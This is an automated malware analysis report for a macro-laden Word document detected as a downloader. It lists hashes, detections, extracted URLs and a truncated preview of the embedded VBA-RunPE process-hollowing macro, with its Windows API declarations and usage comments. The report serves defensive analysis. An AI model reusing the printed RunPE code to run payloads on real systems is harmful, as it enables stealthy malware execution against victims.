Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d8b4b6397d126b03…

MALICIOUS

Office (OOXML)

37.8 KB Created: 2021-09-08 06:55:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-09-17
MD5: 4346f1e65b7f49ce669e4c8b3c2691f9 SHA-1: 6e1d46ee98097b0cc16fc5ffad0f9335853f1f3b SHA-256: d8b4b6397d126b03311450b0a511c89921668fe3aa51dfae1d79416997ef9dca
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing VBA macros. The embedded VBA code, identified as a RunPE implementation, is designed to execute arbitrary code. This technique is commonly used to download and run secondary payloads, indicating a downloader or dropper functionality. The ClamAV detection 'Doc.Downloader.Valyria-10004543-0' further supports this assessment.

Heuristics 3

  • ClamAV: Doc.Downloader.Valyria-10004543-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10004543-0
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://github.com/itm4n/VBA-RunPE In document text (OOXML body / shared strings)
    • https://github.com/hasherezade/In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.htmlIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.htmlIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.htmlIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms679284(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html�In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 27599 bytes
SHA-256: 7c3a1e077ece06f1aac55aab32b41e26872a07a37b16511b71c3f35e8413daa0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
' --------------------------------------------------------------------------------
' Title: VBA RunPE
' Filename: RunPE.vba
' GitHub: https://github.com/itm4n/VBA-RunPE
' Date: 2019-12-14
' Author: Clement Labro (@itm4n)
' Description: A RunPE implementation in VBA with Windows API calls. It is
'   compatible with both 32 bits and 64 bits versions of Microsoft Office.
'   The 32 bits version of Office can only run 32 bits executables and the 64 bits
'   version can only run 64 bits executables.
' Usage: 1. In the 'Exploit' procedure at the end of the code, set the path of the
'               file you want to execute (with optional arguments)
'        2. Enable View > Immediate Window (Ctrl + G) (to check execution and error
'               logs)
'        3. Run the macro!
' Tested on: - Windows 7 Pro 64 bits + Office 2016 32 bits
'            - Windows 10 Pro 64 bits + Office 2016 64 bits
' Credit: @hasherezade - https://github.com/hasherezade/ (RunPE written in C++
'   with dynamic relocations)
' --------------------------------------------------------------------------------

Option Explicit

' ================================================================================
'                      ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
' ================================================================================
#If Win64 Then
    Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
    Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
    Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
    Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
    Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
    Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
    Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Lon
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 69632 bytes
SHA-256: 7d73088bb16aecfedbe6fef28cd7bb1f8f6b8a89b440e3bba3557a1752eb1458
Detection
ClamAV: Doc.Downloader.Valyria-10004543-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.